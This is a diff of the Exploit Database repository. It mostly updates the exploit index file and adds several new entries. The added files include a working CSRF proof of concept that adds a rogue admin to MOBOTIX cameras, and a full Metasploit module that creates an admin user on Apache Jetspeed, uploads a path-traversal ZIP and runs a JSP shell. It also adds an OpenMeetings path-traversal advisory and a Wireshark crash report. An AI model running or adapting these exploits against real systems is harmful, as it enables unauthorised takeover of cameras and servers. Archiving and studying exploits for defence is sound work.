 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.PHP SQL Injection Vulnerability",2005-05-06,Kold,php,webapps,0
-25624,platforms/unix/remote/25624.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0
+25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0
-25625,platforms/unix/remote/25625.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)",2005-05-11,K-sPecial,unix,remote,0
+25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)",2005-05-11,K-sPecial,unix,remote,0
 25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability",2005-05-06,"Braden Thomas",osx,remote,0
 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload Vulnerability",2005-05-06,tjomi4,php,remote,0
 25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x URL Tag BBCode.PHP Vulnerability",2005-05-09,Papados,jsp,webapps,0
@ -23548,14 +23548,14 @@ id,file,description,date,author,platform,type,port
 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - (.m3u) Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0
 26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0
 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption PoC",2013-06-24,"Debasish Mandal",windows,dos,0
-26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitary File Upload Vulnerability",2013-06-24,"CWH Underground",php,webapps,0
+26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload Vulnerability",2013-06-24,"CWH Underground",php,webapps,0
 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0
 26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 (global.php id param) - SQL Injection",2013-06-24,"CWH Underground",php,webapps,0
 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0
 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Local Privilege Escalation",2013-06-24,metasploit,windows,local,0
 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,metasploit,linux,remote,0
 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,metasploit,windows,remote,2381
-26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager Arbitary File Upload Vulnerability",2013-06-24,metasploit,php,remote,0
+26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload Vulnerability",2013-06-24,metasploit,php,remote,0
 26422,platforms/linux/remote/26422.rb,"MoinMoin twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0
 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.PHP File Include Vulnerability",2005-10-26,"Andreas Sandblad",php,webapps,0
 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution Vulnerability",2005-10-26,"D. Fabian",windows,remote,0
@ -31569,14 +31569,14 @@ id,file,description,date,author,platform,type,port
 35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,8000
 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80
-35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
+35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0
 35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0
 35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0
 35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
 35044,platforms/php/webapps/35044.txt,"Alguest 1.1 - Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
 35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
-35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0
+35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitrary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0
 35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0
 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
@ -32984,7 +32984,7 @@ id,file,description,date,author,platform,type,port
 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
-36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
+36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
 36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@ -33979,7 +33979,7 @@ id,file,description,date,author,platform,type,port
 37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include Vulnerability",2012-08-10,L0n3ly-H34rT,php,webapps,0
 37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0
-37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
+37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
 37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service Vulnerability",2012-08-20,Dark-Puzzle,windows,dos,0
@ -35866,3 +35866,7 @@ id,file,description,date,author,platform,type,port
 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap-Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0
 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 Directory Traversal / Remote Code Execution",2016-03-30,metasploit,php,remote,80
 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0
 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - CSRF Add Admin Exploit",2016-03-31,LiquidWorm,hardware,webapps,80
 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080
 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
--- a/platforms/hardware/webapps/39641.html
+++ b/platforms/hardware/webapps/39641.html
@ -0,0 +1,96 @@
 <!--
 MOBOTIX Video Security Cameras CSRF Add Admin Exploit
 Vendor: MOBOTIX AG
 Product web page: https://www.mobotix.com
 Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
                  [Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
                  [Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
                  [Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50
 Summary: MOBOTIX is a German System Manufacturer of Professional Video
 Management (VMS) and Smart IP Cameras. These cameras support all standard
 features of MOBOTIX IP cameras like automatic object detection, messaging
 via network and onboard or network recording. The dual lens thermal system
 supports additionally a second optical video sensor with 6-megapixel resolution.
 Desc: The application interface allows users to perform certain actions via
 HTTP requests without performing any validity checks to verify the requests.
 This can be exploited to perform certain actions with administrative privileges
 if a logged-in user visits a malicious web site.
 Tested on: Linux 2.6.37.6+
           thttpd/2.19-MX
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5312
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php
 25.02.2016
 -->
 Add admin user Testingus:
 -------------------------
 <html>
  <body>
    <form action="http://10.0.0.17/admin/access" method="POST">
      <input type="hidden" name="user&#95;name&#95;0" value="admin" />
      <input type="hidden" name="user&#95;group&#95;0" value="admins" />
      <input type="hidden" name="user&#95;passwd&#95;a&#95;0" value="&#42;&#42;&#42;" />
      <input type="hidden" name="user&#95;passwd&#95;b&#95;0" value="&#42;&#42;&#42;" />
      <input type="hidden" name="user&#95;name&#95;2" value="Testingus" />
      <input type="hidden" name="user&#95;group&#95;1" value="admins" />
      <input type="hidden" name="user&#95;passwd&#95;a&#95;2" value="l33tp4ss" />
      <input type="hidden" name="user&#95;passwd&#95;b&#95;2" value="l33tp4ss" />
      <input type="hidden" name="sv&#95;passwd&#95;a" value="" />
      <input type="hidden" name="sv&#95;passwd&#95;b" value="" />
      <input type="hidden" name="super&#95;pin&#95;1" value="" />
      <input type="hidden" name="super&#95;pin&#95;2" value="" />
      <input type="hidden" name="save&#95;config" value="Set" />
      <input type="submit" value="Submit" />
    </form>
  </body>
 </html>
 Add group 'users' to admin area:
 --------------------------------
 <html>
  <body>
    <form action="http://10.0.0.17/admin/acl" method="POST">
      <input type="hidden" name="group&#95;allow&#95;guest&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;live&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;player&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;multiview&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;pda&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;mxcc&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;info&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;imagelink&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;api&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;0" value="on" />
      <input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;0" value="on" />
      <input type="hidden" name="group&#95;name&#95;1" value="guests" />
      <input type="hidden" name="group&#95;name&#95;2" value="users" />
      <input type="hidden" name="group&#95;allow&#95;admin&#95;2" value="on" />
      <input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;2" value="on" />
      <input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;2" value="on" />
      <input type="hidden" name="new&#95;group" value="" />
      <input type="hidden" name="save&#95;config" value="Set" />
      <input type="hidden" name="more&#95;or&#95;less" value="less" />
      <input type="submit" value="Submit" />
    </form>
  </body>
 </html>
--- a/platforms/java/remote/39643.rb
+++ b/platforms/java/remote/39643.rb
@ -0,0 +1,226 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Jetspeed Arbitrary File Upload',
      'Description'    => %q{
        This module exploits the unsecured User Manager REST API and a ZIP file
        path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier
        versions, to upload and execute a shell.
        Note: this exploit will create, use, and then delete a new admin user.
        Warning: in testing, exploiting the file upload clobbered the web
        interface beyond repair. No workaround has been found yet. Use this
        module at your own risk. No check will be implemented.
      },
      'Author'         => [
        'Andreas Lindh', # Vulnerability discovery
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2016-0710'],
        ['CVE', '2016-0709'],
        ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
      ],
      'DisclosureDate' => 'Mar 6 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux', 'win'],
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Apache Jetspeed <= 2.3.0 (Linux)',   'Platform' => 'linux'],
        ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
      ],
      'DefaultTarget'  => 0
    ))
    register_options([
      Opt::RPORT(8080)
    ])
  end
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end
  def print_warning(msg='')
    super("#{peer} - #{msg}")
  end
  def exploit
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user
    # This was originally a typo... but we're having so much fun!
    print_status('Kenny Loggins in')
    kenny_loggins
    print_warning('You have entered the Danger Zone')
    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip
    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
    exec_jsp_shell
  end
  def cleanup
    print_status("Deleting user: #{username}")
    delete_user
    super
  end
  #
  # Exploit methods
  #
  def create_admin_user
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => '/jetspeed/services/usermanager/users',
      'vars_post' => {
        'name'             => username,
        'password'         => password,
        'password_confirm' => password
      }
    )
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/jetspeed/services/usermanager/users/#{username}",
      'vars_post' => {
        'user_enabled' => 'true',
        'roles'        => 'admin'
      }
    )
  end
  def kenny_loggins
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/login/redirector'
    )
    res = send_request_cgi!(
      'method'    => 'POST',
      'uri'       => '/jetspeed/login/j_security_check',
      'cookie'    => res.get_cookies,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password
      }
    )
    @cookie = res.get_cookies
  end
  # Let's pretend we're mechanize
  def import_file
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/portal/Administrative/site.psml',
      'cookie' => @cookie
    )
    html = res.get_html_document
    import_export = html.at('//a[*//text() = "Import/Export"]/@href')
    res = send_request_cgi!(
      'method' => 'POST',
      'uri'    => import_export,
      'cookie' => @cookie
    )
    html = res.get_html_document
    html.at('//form[*//text() = "Import File"]/@action')
  end
  def upload_payload_zip
    zip = Rex::Zip::Archive.new
    zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)
    mime = Rex::MIME::Message.new
    mime.add_part(zip.pack, 'application/zip', 'binary',
                  %Q{form-data; name="fileInput"; filename="#{zip_filename}"})
    mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
    mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')
    case target['Platform']
    when 'linux'
      register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
      register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
    when 'win'
      register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
      register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
    end
    send_request_cgi(
      'method' => 'POST',
      'uri'    => import_file,
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'cookie' => @cookie,
      'data'   => mime.to_s
    )
  end
  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/jetspeed/#{jsp_filename}",
      'cookie' => @cookie
    )
  end
  #
  # Cleanup methods
  #
  def delete_user
    send_request_cgi(
      'method' => 'DELETE',
      'uri'    => "/jetspeed/services/usermanager/users/#{username}"
    )
  end
  # XXX: This is a hack because FileDropper doesn't delete directories
  def on_new_session(session)
    super
    case target['Platform']
    when 'linux'
      print_status("Deleting user temp directory: ../temp/#{username}")
      session.shell_command_token("rm -rf ../temp/#{username}")
    when 'win'
      print_status("Deleting user temp directory: ..\\temp\\#{username}")
      session.shell_command_token("rd /s /q ..\\temp\\#{username}")
    end
  end
  #
  # Utility methods
  #
  def username
    @username ||= Rex::Text.rand_text_alpha_lower(8)
  end
  def password
    @password ||= Rex::Text.rand_text_alphanumeric(8)
  end
  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end
  def zip_filename
    @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
  end
 end
--- a/platforms/linux/webapps/39642.txt
+++ b/platforms/linux/webapps/39642.txt
@ -0,0 +1,26 @@
 Severity: Moderate
 Vendor: The Apache Software Foundation
 Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0
 Description:
 The Import/Export System Backups functionality in the OpenMeetings
 Administration menu (http://domain:5080/openmeetings/#admin/backup) is vulnerable to path
 traversal via specially crafted file names within ZIP archives. 
 By uploading an archive containing a file named ../../../public/hello.txt will write
 the file "hello.txt" to the http://domain:5080/openmeetings/public/ directory. This could
 be used to, for example, overwrite the /usr/bin/convert file (or any other 3 rd party
 integrated executable) with a shell script, which would be executed the next time an image
 file is uploaded and imagemagick is invoked.
 All users are recommended to upgrade to Apache OpenMeetings 3.1.1
 Credit: This issue was identified by Andreas Lindh
 Apache OpenMeetings Team
 -- 
 WBR
 Maxim aka solomax
--- a/platforms/multiple/dos/39644.txt
+++ b/platforms/multiple/dos/39644.txt
@ -0,0 +1,98 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=754
 The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==17304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004507c1 bp 0x7fff09b13420 sp 0x7fff09b12bd0
 READ of size 1431 at 0x61b00001335c thread T0
    #0 0x4507c0 in __interceptor_strlen llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581
    #1 0x7fead8aeeb02 in g_strdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b02)
    #2 0x7feae0a0b1ef in string_fvalue_set_string wireshark/epan/ftypes/ftype-string.c:51:30
    #3 0x7feae09e83f8 in fvalue_set_string wireshark/epan/ftypes/ftypes.c:530:2
    #4 0x7feae0867874 in proto_tree_set_string wireshark/epan/proto.c:3572:3
    #5 0x7feae088ae05 in proto_tree_add_string wireshark/epan/proto.c:3478:2
    #6 0x7feae088b135 in proto_tree_add_string_format_value wireshark/epan/proto.c:3492:7
    #7 0x7feae213aa61 in dissect_pktc_rekey wireshark/epan/dissectors/packet-pktc.c:436:5
    #8 0x7feae2139f71 in dissect_pktc wireshark/epan/dissectors/packet-pktc.c:624:16
    #9 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
    #10 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
    #11 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
    #12 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9
    #13 0x7feae296ebf5 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:583:7
    #14 0x7feae297dc90 in dissect wireshark/epan/dissectors/packet-udp.c:1081:5
    #15 0x7feae29719d0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1087:3
    #16 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
    #17 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
    #18 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
    #19 0x7feae19601db in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1978:7
    #20 0x7feae19cf7c1 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2431:14
    #21 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
    #22 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
    #23 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
    #24 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9
    #25 0x7feae1fde9c9 in dissect_null wireshark/epan/dissectors/packet-null.c:458:12
    #26 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
    #27 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
    #28 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
    #29 0x7feae1542dd5 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
    #30 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
    #31 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
    #32 0x7feae080f58e in call_dissector_only wireshark/epan/packet.c:2674:8
    #33 0x7feae0800f4f in call_dissector_with_data wireshark/epan/packet.c:2687:8
    #34 0x7feae0800324 in dissect_record wireshark/epan/packet.c:509:3
    #35 0x7feae07b36c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #36 0x52f11b in process_packet wireshark/tshark.c:3748:5
    #37 0x52840c in load_cap_file wireshark/tshark.c:3504:11
    #38 0x51e71c in main wireshark/tshark.c:2213:13
 0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
 allocated by thread T0 here:
    #0 0x4c2148 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7fead8ad7610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x7feaed2fef08 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
    #3 0x52473d in cf_open wireshark/tshark.c:4215:9
    #4 0x51e12d in main wireshark/tshark.c:2204:9
 SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581 in __interceptor_strlen
 Shadow bytes around the buggy address:
  0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
  0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==17304==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12242. Attached is a file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39644.zip
--- a/platforms/php/webapps/8773.txt
+++ b/platforms/php/webapps/8773.txt
@ -1,5 +1,4 @@
                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  
--- a/platforms/unix/remote/22442.c
+++ b/platforms/unix/remote/22442.c
@ -1,7 +1,8 @@
 /* 
 source: http://www.securityfocus.com/bid/7230/info
 A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This condition has been confirmed to be exploitable by remote attackers to execute instructions on target systems. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed Sendmail 8.12.9. 
-
+*/
 /*
 * local exploit for sendmail 8.11.6 
 * by sorbo (sorbox@yahoo.com)